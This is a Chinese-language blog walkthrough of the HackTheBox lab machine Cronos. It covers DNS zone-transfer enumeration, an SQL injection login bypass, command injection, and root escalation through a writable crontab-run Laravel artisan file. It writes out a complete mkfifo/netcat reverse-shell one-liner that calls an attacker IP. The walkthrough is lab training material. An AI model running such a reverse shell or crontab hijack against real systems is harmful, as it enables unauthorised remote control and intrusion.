**

HackTheBox-Linux-Cronos-Walkthrough

**

靶机地址：https://www.hackthebox.eu/home/machines/profile/11
靶机难度：初级（4.5/10）
靶机发布日期：2017年10月13日
靶机描述：
CronOS focuses mainly on different vectors for enumeration and also emphasises the risks associated with adding world-writable files to the root crontab. This machine also includes an introductory-level SQL injection vulnerability.

作者：大余
时间：2020-05-14

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.13…

Nmap发现了一个OpenSSH服务器，一个DNS服务器和一个Apache服务器…

这里应该是存在子域名信息…

尽管必须猜测初始域名cronos.htb，可以通过进行区域传输来枚举其余的子域，将cronos.htb添加到/etc/hosts文件后，使用dig发现了admin…域名…继续添加即可…

通过获得的子域名，添加到hosts后，访问是登陆页面…


通过测试…存在sql注入…简单的注入登陆进来了…是一个cmd类似的命令框架…这就直接提权即可…

命令：rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.51 4444 >/tmp/f
直接一句话提权输入…获得了低权shell，成功获得user信息…

利用https://github.com/rebootuser/LinEnum工具上传枚举linux服务器所有信息…

通过集体枚举，查看到crontab每分钟以root身份执行/var/www/laravel/artisan…并且进入查看后具有写入等功能…

这里我直接利用kali自导的shell覆盖提权…成功获得了root信息…（常规操作）
或者还可以echo写入shell命令，等等方式提权，随便怎么弄…

当然还可以在/var/www/admin/config里头查看到mysql账号密码…通过访问数据库获得admin的哈希密码…**即可…需要时间…

由于我们已经成功得到root权限查看user和root.txt，因此完成这台简单的靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。